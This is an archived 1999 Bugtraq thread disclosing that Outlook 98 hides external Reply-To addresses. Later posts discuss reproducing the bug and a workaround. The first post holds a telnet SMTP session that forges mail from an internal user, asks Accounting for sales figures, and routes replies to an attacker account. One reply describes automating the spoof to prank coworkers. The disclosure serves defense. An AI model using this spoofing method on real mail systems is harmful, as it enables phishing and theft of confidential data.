ms.outlook.spoof.txt

`Date: Tue, 20 Apr 1999 15:10:05 -0700  
From: Nate Lawson <[email protected]>  
To: [email protected]  
Subject: Outlook 98 allows spoofing internal users  
  
Problem: Outlook uses a sender's Reply-To address silently, allowing  
a user to inadvertently send data to an Internet mail account  
when intending to reply to an internal, trusted user.  
  
Impact: Anyone on the Internet can spoof a trusted internal Exchange user  
and get replies sent back to themself without the user knowing they  
weren't responding to another internal user.  
  
How to reproduce:  
  
1. Spoof mail as an internal user with a Reply-To address claiming to be  
an internal user, but an address of an Internet account, say hotmail.  
2. Go into Outlook and read the mail. The mail looks like it was internally  
generated but viewing the full Internet headers under View->Options  
shows the bogus Reply-To header.  
3. Hit Reply in Outlook. The To: field looks like it's going to a valid  
internal user, but right clicking on it and choosing Properties shows  
that the internal user it is sending the reply to is actually an Internet  
address.  
4. Enter some text and hit Send. Observe that the mail went to the attacker's  
account, not the internal one.  
  
A quick script:  
  
{root 5:00pm} ~> telnet mail.example.com 25  
Trying 10.20.2.5...  
Connected to mail.example.com.  
Escape character is '^]'.  
220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready  
helo losebag  
250 OK  
mail from:<>  
250 OK - mail from <>  
rcpt to:<[email protected]>  
250 OK - Recipient <[email protected]>  
data  
354 Send data. End with CRLF.CRLF  
>From: Nate Lawson  
To: Accounting  
Reply To: Nate Lawson<[email protected]>  
Subject: important!  
  
Please reply with the latest copy of our sales figures!  
  
Thanks,  
Nate  
.  
250 OK  
quit  
221 closing connection  
Connection closed by foreign host.  
  
Now, a reply to the email will go not to the trusted internal user Nate  
Lawson <[email protected]> but to the attacker, <[email protected]>.  
Worse, the user sees no indication that the mail is outward-bound! The  
To: field on the reply simply shows "Nate Lawson", a valid internal user.  
  
Affected programs: Only tested on Outlook 98  
  
Known use of this bug to get confidential information: none yet  
  
Suggested Fix: always show the full email address of any recipient that is  
not local (i.e. [email protected] would be hidden but any instance of  
[email protected] would be shown)  
  
Microsoft has been notified, but claimed this was a weakness in SMTP and  
would not be fixed until a secure successor to SMTP is implemented. They  
obviouly missed the point -- the error is not in that mail can be forged,  
but that Outlook allows a user to respond to a message that looks local  
and legitimate, but is actually destined for an outside address.  
  
-Nate  
  
-----------------------------------------------------------------------  
  
Date: Sun, 25 Apr 1999 18:36:11 +0200  
From: Peter van Dijk <[email protected]>  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote:  
>  
> Suggested Fix: always show the full email address of any recipient that is  
> not local (i.e. [email protected] would be hidden but any instance of  
> [email protected] would be shown)  
  
Yeah, like: I am [email protected] and I'd like outlook to hide [email protected].  
  
Outlook should not be hiding anything..  
  
Greetz, Peter  
--  
| 'He broke my heart, | Peter van Dijk |  
I broke his neck' | [email protected] |  
nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |  
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |  
  
-----------------------------------------------------------------------  
  
Date: Sun, 2 May 1999 21:41:39 +0200  
From: Sebastian Schreiber <[email protected]>  
Reply-To: [email protected]  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
Hi Nate,  
  
I was not able to reproduce the exploit that you reported to the  
bugtraq mailing list. Outlook98 did exactly what I expected: when I  
open the mail, I see the "From:"-header in the message. When I reply  
to the email, Outlook takes the "Reply-To:"-address of the  
header. Which version of Outlook did you test?  
  
Best Regards, Sebastian  
  
PS: your "quick script" has a little bug: the header entry should be  
"Reply-To:" instead of "Reply To:".  
  
--  
-- What's a letter? Is it like E-mail? ((o)(o))  
|---------------------------------------------------ooOo-( )-oOoo-|  
| Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen ( ) |  
| Germany, Voice: ++49 (0)7071 49570 ( ) |  
| GSM: 0049-173-3502725 (..) |  
|------------------------------------------------------------------|  
Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98  
  
-----------------------------------------------------------------------  
  
Date: Wed, 5 May 1999 11:05:03 +1000  
From: Toby Chamberlain <[email protected]>  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
Howdy,  
  
I _was_ able to reproduce the exploit to great effect... I created a  
perl script to automate the process, passed it on to the office clown  
and had a great time listening to the varied match-making arrangements  
he set up.  
  
The problem seems to be that Outlook (in the default setup) hides the  
address part of the reply-to header when using it to create the value to  
put in the "To" box of the reply. A reply-to header of "John Smith  
<[email protected]>" shows up as simply "John Smith" in the "To:" box  
when you hit reply... but of course so does "John Smith  
<[email protected]>". The other mail readers I tested it on  
(Hotmail and Netscape Messenger) showed the reply-to header in full.  
  
Cheers  
Toby  
  
  
>Hi Nate,  
>  
>I was not able to reproduce the exploit that you reported to the  
>bugtraq mailing list. Outlook98 did exactly what I expected: when I  
>open the mail, I see the "From:"-header in the message. When I reply  
>to the email, Outlook takes the "Reply-To:"-address of the  
>header. Which version of Outlook did you test?  
>  
>Best Regards, Sebastian  
>  
>PS: your "quick script" has a little bug: the header entry should be  
> "Reply-To:" instead of "Reply To:".  
  
-----------------------------------------------------------------------  
  
Date: Thu, 6 May 1999 11:36:38 -0700  
From: Russ Johnson <[email protected]>  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
I'm sending this from an Outlook 98 client.  
  
If you don't have message quoting on, then you are correct. It's tough to determine where a message is going, whether it's  
internal or external.  
  
For instance, when I hit the "Reply to all" button, it includes the following two entries in the To: field:  
  
Toby Chamberlain; [email protected]  
  
(I removed Toby from the TO: field, since he should get this in the list)  
  
No mention of Toby's email address. It could be internal or external. I agree that MS should give some indication in the  
To: field that this isn't an internal address.  
  
Until such time that MS agrees with us, the simple work around is to make sure to use the "Include Original Message"  
option for replies and forwards. (TOOLS>OPTIONS>EMAIL OPTIONS, lower half of dialog.) Then, the original message is  
included, with the header outlined below. As you can see, the external email address is there for all to see. Even when  
you spoof it as outlined previously. Of course, this leaves open the possibility that users won't edit the "quoted" text  
for brevity, and we end up with exponentially growing mail.  
  
It's not the best solution, but MS may choose to not agree with us.  
  
Russ  
  
-----Original Message-----  
From: Toby Chamberlain [mailto:[email protected]]  
Sent: Tuesday, May 04, 1999 6:05 PM  
To: [email protected]  
Subject: Re: Outlook 98 allows spoofing internal users  
  
`